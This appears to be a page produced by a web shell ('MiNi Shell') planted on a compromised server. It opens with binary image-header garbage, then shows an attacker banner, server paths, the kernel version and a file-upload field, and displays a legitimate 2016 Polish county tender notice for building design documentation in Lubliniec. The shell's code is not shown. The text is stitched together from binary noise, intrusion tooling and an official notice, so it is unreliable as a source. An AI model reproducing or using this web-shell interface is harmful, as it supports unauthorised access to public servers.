JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160411/84338-N-2016.html

<p class="kh_header"><b>Lubliniec: Opracowanie dokumentacji projektowej</b><br>
<b>Numer ogłoszenia: 84338 - 2016; data zamieszczenia: 11.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Paderewskiego 7, 42-700 Lubliniec, woj. śląskie, tel. 034 3510514, faks 034 3510511.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubliniec.starostwo.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie dokumentacji projektowej w ramach czterech zadań:

ZADANIE NR I:

1.Opracowanie dokumentacji projektowej dla zadania pn. Termomodernizacja  budynku internatu chłopców, budynku kotłowni z częścią mieszkalną, Zasadniczej Szkoły Zawodowej, Szkoły Podstawowej, pawilonu kuchni oraz portierni poprzez: modernizację instalacji co, cuw., wymianę okien i drzwi, docieplenie strop hodachu, ocieplenie ścian w Specjalnym Ośrodku Szkolno-Wychowawczym  w Lublińcu przy ulicy Stalmacha nr 90. 
2.Zakres opracowania obejmuje wykonanie dokumentacji projektowo - kosztorysowej:
1) projekty budowlane oraz projekty wykonawcze w branżach:
a) architektoniczna - 4 egzemplarze
b) sanitarna- 4 egzemplarze
c) centralnego ogrzewania- 4 egzemplarze
2) dokumentacja kosztorysowa obejmuje:
a) przedmiary robót- 1 egzemplarz
b) kosztorys inwestorski- 1 egzemplarz
3.	W zakres dokumentacji wchodzą również wszelkie dokumentacje i opracowania niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych a wynikające z wytycznych konserwatorskich, miejscowego planu itp., oraz wszelkie uzgodnienia.
4.Całość dokumentacji Wykonawca dostarczy Zamawiającemu w formie cyfrowej tj. na płycie CD.                                                                
5.Dokumentację należy wykonać w oparciu o audyt energetyczny stanowiący załącznik nr 2 do SIWZ.

ZADANIE NR II:
1.Opracowanie dokumentacji projektowej dla zadania pn. Termomodernizacja budynku przeznaczonego na Centrum Kształcenia Zawodowego i Ustawicznego poprzez: modernizację instalacji co, cuw, docieplenie stropodachu, ocieplenie ścian w Lublińcu przy ulicy Pawła Stalmacha nr 90 (Internat dziewcząt).
2.Zakres opracowania obejmuje wykonanie dokumentacji projektowo - kosztorysowej:
1) projekty budowlane oraz projekty wykonawcze w branżach:
a) architektoniczna - 4 egzemplarze
b) sanitarna - 4 egzemplarze
c) centralnego ogrzewania- 4 egzemplarze
2) dokumentacja kosztorysowa obejmuje:
a) przedmiary robót- 1 egzemplarz
b) kosztorys inwestorski- 1 egzemplarz
3.W zakres dokumentacji wchodzą również wszelkie dokumentacje i opracowania niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych a wynikające z wytycznych konserwatorskich, miejscowego planu itp., oraz wszelkie uzgodnienia.
4.Całość dokumentacji Wykonawca dostarczy Zamawiającemu w formie cyfrowej tj. na płycie CD.                                                                         
5.Dokumentację należy wykonać w oparciu o audyt energetyczny stanowiący załącznik nr 3 do SIWZ.

ZADANIE III:
1.Opracowanie dokumentacji projektowej dla zadania pn. aktualizacja audytu energetycznego i wykonanie dokumentacji  projektowej  kotłowni gazowej, przyłącza gazu, cuw oraz remont  węzłów sanitarnych na czterech kondygnacjach Budynku Powiatowego Centrum Usług Społecznych w Lublińcu przy ulicy Sobieskiego nr 9. 
2.Zakres opracowania obejmuje wykonanie dokumentacji projektowo - kosztorysowej:
1) projekty budowlane oraz projekty wykonawcze: 
a) audyt energetyczny - 1 egzemplarz
b) branża sanitarna - 4 egzemplarze
c) branża centralnego ogrzewania- 4 egzemplarze
2) dokumentacja kosztorysowa obejmuje:
a) przedmiary robót- 1 egzemplarz
b) kosztorys inwestorski- 1 egzemplarz
3. W zakres dokumentacji wchodzą również wszelkie dokumentacje i opracowania niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych a wynikające z wytycznych konserwatorskich, miejscowego planu itp., oraz wszelkie uzgodnienia.
4. Całość dokumentacji Wykonawca dostarczy Zamawiającemu w formie cyfrowej tj. na płycie CD.
5. Dokumentację należy wykonać w oparciu o audyt energetyczny stanowiący załącznik nr 4 do SIWZ.
      
ZADANIE IV:   
1.Opracowanie dokumentacji projektowej dla zadania pn. aktualizacja audytu energetycznego i wykonanie dokumentacji projektowej  kotłowni gazowej w Zespole Szkół nr 1 im. Adama Mickiewicza w Lublińcu przy ulicy Sobieskiego nr 22. 
2.Zakres opracowania obejmuje wykonanie dokumentacji projektowo - kosztorysowej:
1) projekty budowlane oraz projekty wykonawcze:
a) audyt energetyczny - 1 egzemplarz 
b) branża centralnego ogrzewania- 4 egzemplarze
2) dokumentacja kosztorysowa obejmuje:
a) przedmiary robót- 1 egzemplarz
b) kosztorys inwestorski- 1 egzemplarz
3.W zakres dokumentacji wchodzą również wszelkie dokumentacje i opracowania niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych a wynikające z wytycznych konserwatorskich, miejscowego planu itp., oraz wszelkie uzgodnienia.
4.Całość dokumentacji Wykonawca dostarczy Zamawiającemu w formie cyfrowej tj. na płycie CD.
5.Dokumentację należy wykonać w oparciu o audyt energetyczny stanowiący załącznik nr 5 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu nie jest wymagane wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż zrealizował/realizuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej jedną usługę w zakresie projektowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż co najmniej jedna osoba, która będzie uczestniczyć w wykonaniu zamówienia posiada uprawnienia projektowe lub wykonawcze, które w swoim zakresie uprawniają do realizacji zamówienia projektowego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za najważniejsze usługi zamawiający uzna: co najmniej jedną usługę w zakresie projektowania;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiającemu przysługuje prawo zmiany niniejszej umowy w przypadku:
a)przesunięcia  terminu realizacji zamówienia, jeśli wystąpią zewnętrzne przyczyny niezależne od Wykonawcy  uniemożliwiające wykonanie  usługi  i jednocześnie wydłużenia  okresu realizacji usługi o czas trwania tych okoliczności,
b)ustawowej zmiany wysokości podatku VAT,
c) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac. m.in. śmierć, choroba, ustanie stosunku pracy, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje, jak osoby wskazane w umowie,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubliniec.starostwo.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lublińcu
ul. Paderewskiego 7
42-700 Lubliniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2016 godzina 09:30, miejsce: Starostwo Powiatowe w Lublińcu
ul. Paderewskiego 7
42-700 Lubliniec, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Opracowanie dokumentacji projektowej dla zadania pn. Termomodernizacja  budynku internatu chłopców, budynku kotłowni z częścią mieszkalną, Zasadniczej Szkoły Zawodowej, Szkoły Podstawowej, pawilonu kuchni oraz portierni poprzez: modernizację instalacji co, cuw., wymianę okien i drzwi, docieplenie strop hodachu, ocieplenie ścian w Specjalnym Ośrodku Szkolno-Wychowawczym  w Lublińcu przy ulicy Stalmacha nr 90. 
2.Zakres opracowania obejmuje wykonanie dokumentacji projektowo - kosztorysowej:
1) projekty budowlane oraz projekty wykonawcze w branżach:
a) architektoniczna - 4 egzemplarze
b) sanitarna- 4 egzemplarze
c) centralnego ogrzewania- 4 egzemplarze
2) dokumentacja kosztorysowa obejmuje:
a) przedmiary robót- 1 egzemplarz
b) kosztorys inwestorski- 1 egzemplarz
3.W zakres dokumentacji wchodzą również wszelkie dokumentacje i opracowania niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych a wynikające z wytycznych konserwatorskich, miejscowego planu itp., oraz wszelkie uzgodnienia.
4.Całość dokumentacji Wykonawca dostarczy Zamawiającemu w formie cyfrowej tj. na płycie CD.                                                                
5.Dokumentację należy wykonać w oparciu o audyt energetyczny stanowiący załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Opracowanie dokumentacji projektowej dla zadania pn. Termomodernizacja budynku przeznaczonego na Centrum Kształcenia Zawodowego i Ustawicznego poprzez: modernizację instalacji co, cuw, docieplenie stropodachu, ocieplenie ścian w Lublińcu przy ulicy Pawła Stalmacha nr 90 (Internat dziewcząt).
2.Zakres opracowania obejmuje wykonanie dokumentacji projektowo - kosztorysowej:
1) projekty budowlane oraz projekty wykonawcze w branżach:
a) architektoniczna - 4 egzemplarze
b) sanitarna - 4 egzemplarze
c) centralnego ogrzewania- 4 egzemplarze
2) dokumentacja kosztorysowa obejmuje:
a) przedmiary robót- 1 egzemplarz
b) kosztorys inwestorski- 1 egzemplarz
3.W zakres dokumentacji wchodzą również wszelkie dokumentacje i opracowania niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych a wynikające z wytycznych konserwatorskich, miejscowego planu itp., oraz wszelkie uzgodnienia.
4.Całość dokumentacji Wykonawca dostarczy Zamawiającemu w formie cyfrowej tj. na płycie CD.                                                                         
5.Dokumentację należy wykonać w oparciu o audyt energetyczny stanowiący załącznik nr 3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Opracowanie dokumentacji projektowej dla zadania pn. aktualizacja audytu energetycznego i wykonanie dokumentacji  projektowej  kotłowni gazowej, przyłącza gazu, cuw oraz remont  węzłów sanitarnych na czterech kondygnacjach Budynku Powiatowego Centrum Usług Społecznych w Lublińcu przy ulicy Sobieskiego nr 9. 
2.Zakres opracowania obejmuje wykonanie dokumentacji projektowo - kosztorysowej:
1) projekty budowlane oraz projekty wykonawcze: 
a) audyt energetyczny - 1 egzemplarz
b) branża sanitarna - 4 egzemplarze
c) branża centralnego ogrzewania- 4 egzemplarze
2) dokumentacja kosztorysowa obejmuje:
a) przedmiary robót- 1 egzemplarz
b) kosztorys inwestorski- 1 egzemplarz
3. W zakres dokumentacji wchodzą również wszelkie dokumentacje i opracowania niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych a wynikające z wytycznych konserwatorskich, miejscowego planu itp., oraz wszelkie uzgodnienia.
4. Całość dokumentacji Wykonawca dostarczy Zamawiającemu w formie cyfrowej tj. na płycie CD.
5. Dokumentację należy wykonać w oparciu o audyt energetyczny stanowiący załącznik nr 4 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji projektowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Opracowanie dokumentacji projektowej dla zadania pn. aktualizacja audytu energetycznego i wykonanie dokumentacji projektowej  kotłowni gazowej w Zespole Szkół nr 1 im. Adama Mickiewicza w Lublińcu przy ulicy Sobieskiego nr 22. 
2.Zakres opracowania obejmuje wykonanie dokumentacji projektowo - kosztorysowej:
1) projekty budowlane oraz projekty wykonawcze:
a) audyt energetyczny - 1 egzemplarz 
b) branża centralnego ogrzewania- 4 egzemplarze
2) dokumentacja kosztorysowa obejmuje:
a) przedmiary robót- 1 egzemplarz
b) kosztorys inwestorski- 1 egzemplarz
3.W zakres dokumentacji wchodzą również wszelkie dokumentacje i opracowania niezbędne do uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych a wynikające z wytycznych konserwatorskich, miejscowego planu itp., oraz wszelkie uzgodnienia.
4.Całość dokumentacji Wykonawca dostarczy Zamawiającemu w formie cyfrowej tj. na płycie CD.
5.Dokumentację należy wykonać w oparciu o audyt energetyczny stanowiący załącznik nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com